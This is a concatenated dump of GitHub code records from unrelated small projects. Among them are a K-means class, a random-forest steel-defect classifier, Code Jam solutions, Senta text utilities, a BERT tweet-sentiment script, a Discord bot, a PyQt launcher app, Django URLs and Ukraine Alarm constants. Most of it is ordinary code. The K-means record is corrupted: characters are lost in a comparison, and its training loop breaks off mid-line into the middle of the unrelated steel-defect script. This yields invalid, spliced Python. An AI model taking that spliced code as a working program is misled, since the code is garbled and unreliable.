predictions\nos.system(\n \"python /content/virtual_clothes_try_on_assistant/test.py --name output --dataset_dir /content/inputs --checkpoint_dir /content/virtual_clothes_try_on_assistant/checkpoints --save_dir /content/\")\n# os.system(\"rm -rf /content/inputs\")\nos.system(\"rm -rf /content/output/.ipynb_checkpoints\")","repo_name":"shirsneh/virtual_clothes_try_on_assistant","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24475512656","text":"import numpy as np\nclass KMean:\n def __init__(self):\n self.Location=None\n self.Data=None\n self.TotalData=None\n self.Attributes=None\n self.Lower=None\n self.Upper=None\n self.Centroid=None\n self.Cluster=None\n self.Similarity=0.0\n self.Dissimilarity=0.0\n self.TotalCluster=0\n def readData(self,Location,TotalCluster):\n self.TotalCluster=TotalCluster\n with open(Location,'r') as f:\n lines=f.read().split(\"\\n\")\n self.TotalData=int((lines[0].split(\",\"))[0])\n self.Attributes=int((lines[0].split(\",\"))[1])\n self.Data=np.zeros((self.TotalData,self.Attributes),dtype=float)\n for i in range(self.TotalData):\n row=lines[i+1].split(\",\")\n for j in range(self.Attributes):\n self.Data[i][j]=float(row[j])\n self.Lower=np.amin(self.Data,axis=0)\n self.Upper=np.amax(self.Data,axis=0)\n \n def manhattanDistance(self,v1,v2):\n return np.sum(abs(v1-v2)) \n \n def createCentroid(self):\n self.Centroid=np.zeros((self.TotalCluster,self.Attributes),dtype=float)\n for i in range(self.TotalCluster):\n self.Centroid[i]=(np.random.rand()*(self.Upper-self.Lower))+self.Lower\n \n def updateCentroid(self):\n for i in range(len(self.Cluster)):\n array=self.getIndexFromCluster(self.Cluster[i])\n for j in range(self.Attributes):\n tempSum=0.0\n for element in array:\n tempSum+=self.Data[element][j]\n self.Centroid[i][j]=tempSum/np.sum(self.Cluster[i])\n \n def getIndexFromCluster(self,array):\n return np.array([index for index in range(len(array)) if array[index]==1])\n \n def createCluster(self):\n #Cluster=TotalCluster*[[None]]\n self.Similarity=0.0\n self.Dissimilarity=0.0\n self.Cluster=np.zeros((self.TotalCluster,self.TotalData),dtype=int)\n for i in range(self.TotalData):\n min_distance=self.manhattanDistance(self.Data[i],self.Centroid[0])\n max_distance=min_distance\n index=0\n for j in range(self.TotalCluster):\n distance=self.manhattanDistance(self.Data[i],self.Centroid[j])\n if distancemax_distance:\n max_distance=distance\n\n self.Similarity+=min_distance\n self.Dissimilarity+=max_distance\n self.Cluster[index][i]=1\n \n def displayCluster(self):\n i=0\n for array in self.Cluster:\n i+=1\n print(\"\\nCluster {} \\tElements: {}\".format(i,np.sum(array)))\n print([index for index in range(len(array)) if array[index]==1]) \n \n \n def displayData(self):\n print(\"\\n================Data============\\n\")\n print(self.Data)\n \n def displayCentroid(self):\n print(\"\\n================Centroids============\\n\")\n print(self.Centroid)\n \n def manhattanDistance(self,v1,v2):\n return np.sum(abs(v1-v2))\n \n def train(self,iterations,error_margin):\n self.createCentroid()\n self.createCluster()\n self.displayData()\n self.displayCentroid()\n self.displayCluster()\n temp_similarity=self.Similarity\n print(\"\\nSimilarity: {}\\tDissimilarity: {}\".format(self.Similarity,self.Dissimilarity))\n for i in range(iterations):\n self.updateCentroid()\n self.createCluster()\n print(\"\\nSimilarity: {}\\tDissimilarity: {}\".format(self.Similarity,self.Dissimilarity))\n if(temp_similarity-self.Similarity) baseAccuracy:\r\n print(\"Tuning successful! Best accuracy: {} (improvement of {}\".format(tunedAccuracy, (tunedAccuracy-baseAccuracy)))\r\nelse:\r\n print(\"Tuning returned no improvements. Best accuracy: {}\".format(baseAccuracy))\r\n\r\n#Retrain the tuned model using the entire original training dataset\r\nfinalModel = ensemble.RandomForestClassifier(n_estimators=800, min_samples_split=5, min_samples_leaf=1, max_features='sqrt', max_depth=90, bootstrap=False)\r\nfinalModel.fit(trainAtts_old, trainLabels_old)\r\n#Save the final model\r\nfilename = \"879282_finalModel.h5\"\r\nhkl.dump(finalModel, filename, mode='w')\r\nprint(\"Saved final model\")\r\n\r\n#Use saved model to predict classification results of test.csv\r\nload_hkl = hkl.load(filename)\r\nfinalPredictions = load_hkl.predict(testData)\r\n#Save predictions to CSV file\r\ndf = pd.DataFrame({'TypeOfDefects':finalPredictions})\r\ndf.index = df.index + 1 #Start CSV index from 1, not 0\r\ndf.to_csv('UP879282_Predictions.csv', index_label='IndexOfTestSample')\r\nprint(\"Saved predictions\")","repo_name":"samueloneill/steeldefects","sub_path":"Main_Script.py","file_name":"Main_Script.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23645736491","text":"#!/usr/local/bin/python2.7\n# -*- coding: utf-8 -*-\n\nimport sys\nimport math\n\ndef debug(a): sys.stderr.write(str(a) + '\\n')\ndef readarray(foo): return [foo(e) for e in raw_input().split()]\ndef readint(): return int(raw_input().strip())\n\ndebug = lambda x: None\n\ndef calc(A, B):\n \"\"\"\n n = n_0 n_1...n_l-1\n -> m = n_k...n_l-1 n_0 n_1...n_k-1 (k = 1...l-1)\n\n O(B * log(B))\n \"\"\"\n iA = int(A)\n iB = int(B)\n\n assert 1 <= iA <= iB\n\n result = 0\n\n for n in range(iA, iB):\n strn = str(n)\n ms = set()\n\n for k in range(1, len(strn)):\n strm = strn[k:] + strn[:k]\n m = int(strm)\n if n < m <= iB:\n debug('{0} < {1}'.format(n, m))\n ms.add(m)\n\n result += len(ms)\n\n return result\n\nT = readint()\nfor i in xrange(T):\n A, B = raw_input().split()\n print('Case #{0}: {1}'.format(i + 1, calc(A, B)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/486.py","file_name":"486.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25780310676","text":"# -*- coding: utf-8 -*\n\"\"\"import\"\"\"\nimport json\nimport unicodedata\nfrom collections import OrderedDict\nimport six\nfrom paddle.fluid.core_avx import PaddleTensor\nfrom senta.common.rule import MaxTruncation\nimport sys\nimport os\nimport paddle\nimport paddle.fluid as fluid\n\ntry:\n import pkg_resources\n get_module_res = lambda *res: pkg_resources.resource_stream(__name__,\n os.path.join(*res))\nexcept ImportError:\n get_module_res = lambda *res: open(os.path.normpath(os.path.join(\n os.getcwd(), os.path.dirname(__file__), *res)), 'rb')\n\nPY2 = sys.version_info[0] == 2\n\ndefault_encoding = sys.getfilesystemencoding()\n\nif PY2:\n text_type = unicode\n string_types = (str, unicode)\n\n iterkeys = lambda d: d.iterkeys()\n itervalues = lambda d: d.itervalues()\n iteritems = lambda d: d.iteritems()\n\nelse:\n text_type = str\n string_types = (str,)\n xrange = range\n\n iterkeys = lambda d: iter(d.keys())\n itervalues = lambda d: iter(d.values())\n iteritems = lambda d: iter(d.items())\n\ndef strdecode(sentence):\n \"\"\"\n string to unicode\n :param sentence: a string of utf-8 or gbk\n :return: input's unicode result\n \"\"\"\n if not isinstance(sentence, text_type):\n try:\n sentence = sentence.decode('utf-8')\n except UnicodeDecodeError:\n sentence = sentence.decode('gbk', 'ignore')\n return sentence\n\n\ndef check_cuda(use_cuda):\n \"\"\"\n check_cuda\n \"\"\"\n err = \\\n \"\\nYou can not set use_cuda = True in the model because you are using paddlepaddle-cpu.\\n \\\n Please: 1. Install paddlepaddle-gpu to run your models on GPU or 2. Set use_cuda = False to run models on CPU.\\n\"\n try:\n if use_cuda == True and fluid.is_compiled_with_cuda() == False:\n print(err)\n sys.exit(1)\n except Exception as e:\n pass\n\ndef parse_data_config(config_path):\n \"\"\"\n :param config_path:\n :return:\n \"\"\"\n try:\n with open(config_path) as json_file:\n config_dict = json.load(json_file, object_pairs_hook=OrderedDict)\n except Exception:\n raise IOError(\"Error in parsing Ernie model config file '%s'\" % config_path)\n else:\n return config_dict\n\n\ndef parse_version_code(version_str, default_version_code=1.5):\n \"\"\"\n parser paddle fluid version code to float type\n :param version_str:\n :param default_version_code:\n :return:\n \"\"\"\n if version_str:\n v1 = version_str.split(\".\")[0:2]\n v_code_str = \".\".join(v1)\n v_code = float(v_code_str)\n return v_code\n else:\n return default_version_code\n\n\ndef truncation_words(words, max_seq_length, truncation_type):\n \"\"\"\n :param words:\n :param max_seq_length:\n :param truncation_type:\n :return:\n \"\"\"\n if len(words) > max_seq_length:\n if truncation_type == MaxTruncation.KEEP_HEAD:\n words = words[0: max_seq_length]\n elif truncation_type == MaxTruncation.KEEP_TAIL:\n tmp = words[0: max_seq_length - 1]\n tmp.append(words[-1])\n words = tmp\n elif truncation_type == MaxTruncation.KEEP_BOTH_HEAD_TAIL:\n tmp = words[1: max_seq_length - 2]\n tmp.insert(0, words[0])\n tmp.insert(max_seq_length - 1, words[-1])\n words = tmp\n else:\n words = words[0: max_seq_length]\n\n return words\n\n\ndef truncate_seq_pair(tokens_a, tokens_b, max_length):\n \"\"\"\n :param tokens_a:\n :param tokens_a:\n :param max_length:\n :return:\n \"\"\"\n while True:\n total_length = len(tokens_a) + len(tokens_b)\n if total_length <= max_length:\n break\n if len(tokens_a) > len(tokens_b):\n tokens_a.pop()\n else:\n tokens_b.pop()\n\n\ndef convert_to_unicode(text):\n \"\"\"Converts `text` to Unicode (if it's not already), assuming utf-8 input.\"\"\"\n if six.PY3:\n if isinstance(text, str):\n return text\n elif isinstance(text, bytes):\n return text.decode(\"utf-8\", \"ignore\")\n else:\n raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n elif six.PY2:\n if isinstance(text, str):\n return text.decode(\"utf-8\", \"ignore\")\n elif isinstance(text, unicode):\n return text\n else:\n raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n else:\n raise ValueError(\"Not running on Python2 or Python 3?\")\n\n\ndef whitespace_tokenize(text):\n \"\"\"Runs basic whitespace cleaning and splitting on a peice of text.\"\"\"\n text = text.strip()\n if not text:\n return []\n tokens = text.split()\n return tokens\n\n\ndef is_whitespace(char):\n \"\"\"Checks whether `chars` is a whitespace character.\"\"\"\n # \\t, \\n, and \\r are technically contorl characters but we treat them\n # as whitespace since they are generally considered as such.\n if char == \" \" or char == \"\\t\" or char == \"\\n\" or char == \"\\r\":\n return True\n cat = unicodedata.category(char)\n if cat == \"Zs\":\n return True\n return False\n\n\ndef is_control(char):\n \"\"\"Checks whether `chars` is a control character.\"\"\"\n # These are technically control characters but we count them as whitespace\n # characters.\n if char == \"\\t\" or char == \"\\n\" or char == \"\\r\":\n return False\n cat = unicodedata.category(char)\n if cat.startswith(\"C\"):\n return True\n return False\n\n\ndef is_punctuation(char):\n \"\"\"Checks whether `chars` is a punctuation character.\"\"\"\n cp = ord(char)\n # We treat all non-letter/number ASCII as punctuation.\n # Characters such as \"^\", \"$\", and \"`\" are not in the Unicode\n # Punctuation class but we treat them as punctuation anyways, for\n # consistency.\n if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or\n (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):\n return True\n cat = unicodedata.category(char)\n if cat.startswith(\"P\"):\n return True\n return False\n\n\ndef printable_text(text):\n \"\"\"Returns text encoded in a way suitable for print or `tf.logging`.\"\"\"\n\n # These functions want `str` for both Python2 and Python3, but in one case\n # it's a Unicode string and in the other it's a byte string.\n if six.PY3:\n if isinstance(text, str):\n return text\n elif isinstance(text, bytes):\n return text.decode(\"utf-8\", \"ignore\")\n else:\n raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n elif six.PY2:\n if isinstance(text, str):\n return text\n elif isinstance(text, unicode):\n return text.encode(\"utf-8\")\n else:\n raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n else:\n raise ValueError(\"Not running on Python2 or Python 3?\")\n\n\ndef array2tensor(arr_data):\n \"\"\" convert numpy array to PaddleTensor\"\"\"\n tensor_data = PaddleTensor(arr_data)\n return tensor_data\n\n\ndef save_infer_data_meta(data_dict, save_file):\n \"\"\"\n :param data_dict:\n :param save_file:\n :return:\n \"\"\"\n\n json_str = json.dumps(data_dict)\n with open(save_file, 'w') as json_file:\n json_file.write(json_str)\n\n","repo_name":"baidu/Senta","sub_path":"senta/utils/util_helper.py","file_name":"util_helper.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","stars":1780,"dataset":"github-code","pt":"61"} +{"seq_id":"74029089795","text":"import os\nimport pandas as pd\nfrom transformers import BertTokenizer, BertForSequenceClassification\nimport torch\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Verifica se o arquivo 'tweets_classificados.csv' já existe e, se existir, apaga\noutput_file_path = 'D:/ADS_FATEC/6_periodo/TG_II/tweets_classificados_2023.csv'\nif os.path.exists(output_file_path):\n os.remove(output_file_path)\n\n# Carrega os dados do CSV com tweets não classificados\nlines = []\nfile_path = 'D:/ADS_FATEC/6_periodo/TG_II/tweets_2023.csv'\n\n# Abre o arquivo CSV e lê os dados\nwith open(file_path, 'r', encoding='utf-8-sig') as file:\n for line in file:\n # Adiciona cada linha à lista, removendo qualquer espaço em branco adicional\n lines.append(line.strip()) \n\n# Escolhe o modelo pré-treinado\nmodel_name = \"bert-base-uncased\"\n\n# Carrega o tokenizador e o modelo\ntokenizer = BertTokenizer.from_pretrained(model_name)\nmodel = BertForSequenceClassification.from_pretrained(model_name)\n\n# Lista para armazenar os sentimentos classificados\nsentiments = []\n\n# Inicializa dicionários para contar os sentimentos\ncontagem_sentimentos = {'Positivo': 0, 'Negativo': 0}\n\n# Cria uma lista para armazenar os tweets classificados\nclassified_tweets = []\n\n# Para cada tweet não classificado\nfor tweet in lines:\n # Tokeniza o texto\n inputs = tokenizer(tweet, return_tensors=\"pt\", padding=True, truncation=True)\n\n # Realiza a inferência com o modelo\n outputs = model(**inputs)\n logits = outputs.logits\n\n # Calcula as probabilidades\n probabilities = torch.softmax(logits, dim=1)\n\n # Obtem o índice da classe com a maior probabilidade\n predicted_class = torch.argmax(probabilities, dim=1).item()\n\n # Interpreta o resultado\n sentiment_classes = [\"Positivo\", \"Negativo\"]\n sentiment = sentiment_classes[predicted_class]\n\n sentiments.append(sentiment)\n\n # Atualiza a contagem de acordo com o sentimento\n contagem_sentimentos[sentiment] += 1\n\n # Salva o tweet classificado com seu sentimento em uma lista\n classified_tweets.append((tweet, sentiment))\n\n# Salva os tweets classificados em um arquivo CSV\nclassified_data = pd.DataFrame(classified_tweets, columns=['Tweets', 'Sentimento'])\nclassified_data.to_csv(output_file_path, index=False, encoding='utf-8-sig')\n\n# Mostra o total de positivo e negativo\ntotal_positivo = contagem_sentimentos['Positivo']\ntotal_negativo = contagem_sentimentos['Negativo']\n\n# Calcula as porcentagens\ntotal_tweets = total_positivo + total_negativo\npercent_positivo = (total_positivo / total_tweets) * 100\npercent_negativo = (total_negativo / total_tweets) * 100\n\n# Cria um gráfico de barras para visualizar a distribuição dos sentimentos\nsentiment_labels = ['Positivo', 'Negativo']\nsentiment_percentages = [percent_positivo, percent_negativo]\n\nplt.figure(figsize=(6, 4))\nsns.barplot(x=sentiment_labels, y=sentiment_percentages)\nplt.title('Distribuição de Sentimentos (Porcentagem)')\nplt.xlabel('Sentimento')\nplt.ylabel('Porcentagem')\nplt.ylim(0, 100)\nplt.show()","repo_name":"LaraScaranello/web_scraping","sub_path":"analise2.py","file_name":"analise2.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24949479961","text":"import os\nimport discord\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\nfrom trebek import Trebek\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\n\nbot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))\n\n@bot.event\nasync def on_ready():\n for guild in bot.guilds:\n if guild.name == GUILD:\n break\n print(f'{bot.user} is connected to the following guild: \\n'\n f'{guild.name}(id: {guild.id})'\n )\n\n@bot.command()\nasync def please(ctx):\n await ctx.send('just give me a chance!')\n\nbot.add_cog(Trebek(bot))\nbot.run(TOKEN)\n\n","repo_name":"lucas-hopkins/discord_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2070766213","text":"import os.path\nimport sqlite3\nimport sys\nfrom os import startfile\nfrom sys import argv, exit\n\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QTableWidgetItem, QMessageBox\n\nfrom item import AddItem, ChangeItem # диалоги для создания и редактирования элемента\nfrom NewTable import NewTable # диалог для создания новой таблицы\nfrom parent_of_main import MainFromUi # созданный при помощи pyuic5 class\nfrom welcome import Welcome # первое привествие\nfrom contact import ContactInformation # контактная информация\n\n\nclass Main(QMainWindow, MainFromUi): # основной класс\n def __init__(self):\n super(Main, self).__init__()\n self.setupUi(self)\n self.setWindowTitle(\"LaunchApp\")\n self.show()\n # далее идет проверка запускать ли приветствующее окно\n with open(\"data/flag.txt\") as f: # открытие .txt файла для проверки(если пустой - нет, если в нём \"...\" - да)\n if not f.read(): # проверяется нажимал ли пользователь на галочку \"больше не показывать\"\n self.welcome = Welcome() # если условие выполнилось открывается приветствие\n self.welcome.show() # код класса в другом файле\n\n # далее будет показано подключение кнопкок к методам\n self.pushButton_run.clicked.connect(self.run) # кнопка запуска приложений\n self.description.triggered.connect(self.open_description) # описание приложения(в менюбаре)\n self.developer.triggered.connect(self.open_contact_information) # контак. инф. (в менюбаре)\n self.pushButton_new.clicked.connect(self.create_table) # кнопка создания нового раздела\n self.pushButton_add_item.clicked.connect(self.add_item) # кнопка добавления элем. в раздел\n self.pushButton_change_item.clicked.connect(self.change_item) # кнопка изменения элем. в разделе\n self.pushButton_open.clicked.connect(self.open_table) # кнопка открытия раздела(таблицы)\n self.pushButton_del.clicked.connect(self.del_table) # кнопка удаления раздела(таблицы)\n self.pushButton_del_item.clicked.connect(self.del_item) # кнопка удаления элемента в разделе\n self.con = sqlite3.connect(\"LaunchApp.sqlite\") # подключение к базе данных\n self.cur = self.con.cursor() # создание курсора\n self.res = self.cur.execute(\"SELECT name FROM sqlite_master WHERE type='table'\")\n # сверху идёт запрос на получение названий всех разделов\n for i in self.res: # добавление в comboBox всех названий\n if i[0] != \"sqlite_sequence\":\n self.comboBox.addItem(i[0])\n with open(\"data/last_table.txt\", \"r\", encoding=\"utf-8\") as f: # получаем название последней открытой таблицы\n self.last_table = f.read().strip()\n if self.last_table:\n self.current_table = self.last_table\n self.comboBox.setCurrentIndex(self.comboBox.findText(self.current_table)) # выбираем посл. откр. таблицу\n self.update_table() # обращение к методу для заполнения таблицы\n\n def run(self): # запуск приложений\n self.pathes = [path_[0] for path_ in # получение путей к приложениям\n self.cur.execute(f'''SELECT \"Путь\" FROM \"{self.comboBox.currentText()}\"''')]\n for path_ in self.pathes:\n try:\n print(path_)\n startfile(os.path.abspath(path_)) # запуск приложений\n except Exception:\n self.statusbar.showMessage(f\"Нет приложения на пути {os.path.abspath(path_)}\")\n\n def open_description(self): # запуск описания\n startfile(r'Презентация, ТЗ и ПЗ\\Пояснительная записка.docx')\n\n def open_contact_information(self): # диалог с контактной информацией\n self.widget = ContactInformation()\n self.widget.show()\n\n def open_table(self): # метод для запуска раздела\n self.last_open_table(self.comboBox.currentText()) # сохранение последней запущенной таблицы\n self.update_table() # обновление таблицы\n\n def create_table(self): # метод для создания нового раздела\n self.widget = NewTable(self) # диалог для создания нового раздела\n self.widget.show()\n\n def del_table(self): # метод для удаления раздела\n self.message_box = QMessageBox() # MessageBox для уточнения удаления\n self.message_box.setWindowTitle(\"Удаления раздела\") # заголовок\n self.message_box.setText(f\"Вы уверенны что хотите удалить раздел: {self.comboBox.currentText()}?\") # вопрос\n self.message_box.setStandardButtons(QMessageBox.Yes | QMessageBox.No) # создание кнопкок Yes/No\n self.message_box.buttonClicked.connect(self.del_or_no) # обращение к методу при нажатии на кнопку\n self.message_box.exec()\n\n def add_item(self): # метод для создания нового элемента\n self.widget = AddItem(self) # диалог для создания нового элемента\n self.widget.show()\n\n def change_item(self): # метод для редактирования элемента\n self.statusbar.showMessage(\"\")\n self.row = list(set([i.row() for i in self.tableWidget.selectedItems()])) # выбранные строки в таблице\n if not self.row: # проверка выбрана ли хоть какая-то строка\n self.statusbar.showMessage(\"НЕ ВЫБРАНА ЯЧЕЙКА \" * 6)\n else:\n self.row = self.row[0] # первый выбранный элемент\n self.select_data = [self.tableWidget.item(self.row, i).text() for i in range(3)] # данные выбр. элем\n self.widget = ChangeItem(self) # диалог для редактирования элемента\n self.widget.show()\n\n def last_open_table(self, title): # метод для сохранения в .txt файл последнего выбранного раздела\n with open(\"data/last_table.txt\", \"w\", encoding=\"utf8\", newline=\"\") as f:\n f.write(title)\n\n def update_table(self): # заполнение данных в TableWidget\n self.res = self.cur.execute(f'''SELECT * FROM \"{self.comboBox.currentText()}\"''').fetchall()\n self.headerName = [i[1] for i in # названия заголовков таблицы\n self.cur.execute(f\"PRAGMA table_info('{self.comboBox.currentText()}')\").fetchall()]\n # далее идет заполение таблицы\n self.tableWidget.setColumnCount(len(self.headerName))\n self.tableWidget.setHorizontalHeaderLabels(self.headerName)\n self.len_res = len(self.res)\n self.tableWidget.setRowCount(self.len_res)\n for i, elem in enumerate(self.res):\n for j, val in enumerate(elem):\n self.tableWidget.setItem(i, j, QTableWidgetItem(str(val)))\n self.tableWidget.resizeColumnsToContents()\n # далее идет растягивание столбцов\n header = self.tableWidget.horizontalHeader()\n header.setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)\n header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)\n header.setSectionResizeMode(2, QtWidgets.QHeaderView.Stretch)\n\n def del_or_no(self, btn): # метод обрабатывающий Yes/No при удалении таблицы\n if btn.text() == \"&Yes\":\n self.cur.execute(f\"DROP TABLE '{self.comboBox.currentText()}'\") # удаление таблицы из базы данных\n self.con.commit() # сохранение\n self.comboBox.clear() # очищение comboBox\n # получение имен всех таблиц в базе данных\n self.res = self.cur.execute(\"SELECT name FROM sqlite_master WHERE type='table'\").fetchall()\n # заполение имент разделов в comboBox\n for i in self.res:\n if i[0] != \"sqlite_sequence\":\n print(i[0])\n self.comboBox.addItem(i[0])\n\n self.comboBox.setCurrentIndex(self.comboBox.findText(self.res[-1][0])) # выбор таблицы которая\n # стояла перед удаленной таблицой\n self.last_open_table(self.comboBox.currentText()) # сохрание в файл названия выбранной талицы\n self.update_table() # заполение данных в TableWidget\n\n def del_item(self): # удаления элемента\n self.statusbar.showMessage(\"\")\n self.row = list(set([i.row() for i in self.tableWidget.selectedItems()])) # выбранные строки в таблице\n if not self.row: # проверка выбрана ли хоть какая-то строка\n self.statusbar.showMessage(\"НЕ ВЫБРАНА ЯЧЕЙКА \" * 6)\n else:\n self.row = self.row[0] # первый выбранный элемент\n self.select_data = [self.tableWidget.item(self.row, i).text() for i in range(3)] # данные выбр. элем\n self.cur.execute(f'''DELETE from {self.comboBox.currentText()}\n WHERE \"ID\" = {self.select_data[0]}''') # удаление элемента\n self.con.commit() # сохранение\n self.update_table() # заполение данных в TableWidget\n\n\ndef except_hook(cls, exception, traceback): # чтобы показывались ошибки на всякий случай\n sys.__excepthook__(cls, exception, traceback)\n\n\nif __name__ == \"__main__\":\n app = QApplication(argv)\n window = Main()\n sys.excepthook = except_hook\n exit(app.exec())\n","repo_name":"AbulmuslimAtaev/LaunchApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42017656327","text":"import transformers\n\nDEVICE = \"cuda\"\nMAX_LEN = 128\nTRAIN_BATCH_SIZE = 8\nVALID_BATCH_SIZE = 4\nEPOCHS = 10\n\nBERT_PATH = '../input/bert-base-uncased'\nTRAINING_FILE = 'train_preprocess_2.csv'\n# TRAINING_FILE = 'IMDB_Dataset_1.csv'\nMODEL_PATH = 'model_2.bin'\n\nTOKENIZER = transformers.BertTokenizer.from_pretrained(BERT_PATH, do_lower_case=True)\n","repo_name":"abhinandansrivastava/DisasterTweets","sub_path":"src/multiInputClassifier/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43472871014","text":"import numpy as np\nimport random\n\n\ndef sigmoid(val):\n return 1/(1+np.exp(-val))\n\ndef dsigmoid_to_dval(val): \n sig = sigmoid(val)\n return sig * (1 - sig) \n\n\ndef make_results_reproducible():\n random.seed(12345678)\n np.random.seed(12345678)\n\ndef make_results_random():\n random.seed()\n np.random.seed()\n\ndef plot_images(ax ,images_in_row,image_height, image_width,samples,_X,_y):\n \"\"\"\n function is working ONLY if len(samples) % images_in_row is zero\n \n \"\"\"\n images = []\n sample = 0\n\n while sample < len(samples):\n images_row = []\n for _ in range(images_in_row):\n images_row.append(_X[sample].reshape(image_height,image_width))\n sample += 1\n if sample == len(samples):\n break\n \n merged_images_horizontal = np.concatenate(images_row,axis=1) # append horizontaly\n images.append(merged_images_horizontal)\n\n merged_row_images_vertically = np.concatenate(images,axis=0) # append vertically\n ax.imshow(merged_row_images_vertically, cmap='gray')\n ax.axes.xaxis.set_visible(False)\n ax.axes.yaxis.set_visible(False)","repo_name":"NathanKr/neural-networks-learn","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70758483396","text":"class Solution:\n def makeArrayIncreasing(self, arr1: List[int], arr2: List[int]) -> int:\n arr2 = list(set(arr2))\n arr2.sort()\n\n dp = {-1:0}\n\n for i in range(len(arr1)):\n new_dp = defaultdict(lambda: math.inf)\n for prev in dp:\n if arr1[i] > prev:\n new_dp[arr1[i]] = min(new_dp[arr1[i]], dp[prev])\n idx = bisect.bisect_right(arr2, prev)\n if idx < len(arr2):\n new_dp[arr2[idx]] = min(new_dp[arr2[idx]], 1 + dp[prev])\n dp = new_dp\n\n return min(dp.values()) if dp else -1","repo_name":"aso2001/LeetCode","sub_path":"1187-make-array-strictly-increasing/1187-make-array-strictly-increasing.py","file_name":"1187-make-array-strictly-increasing.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23499427391","text":"import os\nimport pprint\ndef main ():\n\toutput = '';\n\t[inputCount, pancakeList] = readFile()\n\tfor i in range(0,int(inputCount)):#no need to match last item\n\t\tpancake = pancakeList[i]\n\t\tprint('pancake: %s'%pancake)\n\t\tcount = 0\n\t\tif pancake[-1] == '-':\n\t\t\tcount = 1\n\t\tfor j in range(0,len(pancake)-1):\n\t\t\tprint('pancake[j]: %s'%pancake[j])\n\t\t\tprint('pancake[j+1]: %s'%pancake[j+1])\n\t\t\tif pancake[j] != pancake[j+1]:\n\t\t\t\tcount+=1\n\t\tp_str = 'Case #{0}: {1}\\n'.format((i+1),count)\n\t\toutput += p_str\n\t\tprint ('\t\t%s'%p_str[0:-1])\n\twriteFile(output)\n\ndef readFile ():\n\twith open('B-large.in') as f:\n\t\ts = f.read()\n\t# s = '9\\n-\\n+\\n-+\\n+-\\n+++\\n--=-\\n--+--+\\n-+-+-+\\n+-+-+-\\n'\n\ts = s.split('\\n')\n\tinputCount = s.pop(0);\n\ts.pop(-1)\n\treturn [inputCount,s]\n\ndef writeFile (str):\n\twith open('B-large.out', 'w') as f:\n\t\tf.write(str)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_178/3893.py","file_name":"3893.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26462104561","text":"from django.urls import path\nfrom .views import SnackCreateView, SnackDeleteView,SnackListView,SnackUpdateView,SnackDetailView\n\n\nurlpatterns = [\n \n path('', SnackListView.as_view(), name='view'), \n path('/', SnackDetailView.as_view(), name='detailView'),\n path('/update/',SnackUpdateView.as_view(), name='update') ,\n path('/delete/',SnackDeleteView.as_view(), name='delete') ,\n path('create/',SnackCreateView.as_view(), name='create') ,\n\n]","repo_name":"Obada-gh/django-crud","sub_path":"snacks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5217469101","text":"\"\"\"Consts for the Ukraine Alarm.\"\"\"\nfrom __future__ import annotations\n\nfrom homeassistant.const import Platform\n\nDOMAIN = \"ukraine_alarm\"\nATTRIBUTION = \"Data provided by Ukraine Alarm\"\nMANUFACTURER = \"Ukraine Alarm\"\nALERT_TYPE_UNKNOWN = \"UNKNOWN\"\nALERT_TYPE_AIR = \"AIR\"\nALERT_TYPE_ARTILLERY = \"ARTILLERY\"\nALERT_TYPE_URBAN_FIGHTS = \"URBAN_FIGHTS\"\nALERT_TYPES = {\n ALERT_TYPE_UNKNOWN,\n ALERT_TYPE_AIR,\n ALERT_TYPE_ARTILLERY,\n ALERT_TYPE_URBAN_FIGHTS,\n}\nPLATFORMS = 